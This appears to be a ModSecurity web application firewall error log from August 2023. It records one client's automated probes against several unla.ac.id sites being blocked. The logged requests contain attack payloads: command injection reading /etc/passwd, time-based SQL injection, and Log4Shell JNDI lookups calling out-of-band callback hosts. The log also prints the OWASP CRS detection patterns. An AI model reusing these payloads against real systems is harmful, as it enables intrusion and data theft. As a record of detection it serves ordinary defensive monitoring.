[Tue Aug 29 11:32:31.350853 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAAQUIGMAAAA2"]
[Tue Aug 29 11:32:32.300623 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARNk4wAAAAS"]
[Tue Aug 29 11:32:32.300710 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARNk4wAAAAS"]
[Tue Aug 29 11:32:32.327098 2023] [:error] [pid 1094] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAARGwdUAAAAL"]
[Tue Aug 29 11:32:32.369557 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAARA7ZsAAAAA"]
[Tue Aug 29 11:32:32.371087 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAAQ83VAAAAAI"]
[Tue Aug 29 11:32:32.372493 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARNk44AAAAS"]
[Tue Aug 29 11:32:32.372538 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARNk44AAAAS"]
[Tue Aug 29 11:32:32.372700 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAARIwIwAAAAO"]
[Tue Aug 29 11:32:32.372980 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAAQOv@EAAAAw"]
[Tue Aug 29 11:32:32.373098 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAQUIGUAAAA2"]
[Tue Aug 29 11:32:32.373184 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAQUIGUAAAA2"]
[Tue Aug 29 11:32:32.392520 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARMMb4AAAAR"]
[Tue Aug 29 11:32:32.392563 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARMMb4AAAAR"]
[Tue Aug 29 11:32:32.392686 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARNk48AAAAS"]
[Tue Aug 29 11:32:32.392732 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARNk48AAAAS"]
[Tue Aug 29 11:32:32.400881 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAPDoHMAAAAP"]
[Tue Aug 29 11:32:32.400951 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAPDoHMAAAAP"]
[Tue Aug 29 11:32:32.412001 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAARLXvIAAAAQ"]
[Tue Aug 29 11:32:35.354748 2023] [:error] [pid 1094] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgpk36r36js3bom.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgpk36r36js3bom.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgiyxwx3e9mq8q8.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAARGwdkAAAAL"]
[Tue Aug 29 11:32:35.361319 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgbiax4azyetp8b.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgbiax4azyetp8b.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgzhpgwkgm8ud5a.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAARIwI8AAAAO"]
[Tue Aug 29 11:32:36.361504 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAARH7H4AAAAM"]
[Tue Aug 29 11:32:36.363645 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAAQ9H4cAAAAK"]
[Tue Aug 29 11:32:36.366635 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAARMMcEAAAAR"]
[Tue Aug 29 11:32:36.382805 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAARA7aEAAAAA"]
[Tue Aug 29 11:32:36.385480 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAARH7H8AAAAM"]
[Tue Aug 29 11:32:36.406312 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAAQ9H4gAAAAK"]
[Tue Aug 29 11:32:37.400229 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAAN9sXIAAAAJ"]
[Tue Aug 29 11:32:37.409347 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAAQ9H4kAAAAK"]
[Tue Aug 29 11:32:37.426796 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAARNk5UAAAAS"]
[Tue Aug 29 11:32:37.447692 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAARMMcQAAAAR"]
[Tue Aug 29 11:32:37.451131 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAARNk5YAAAAS"]
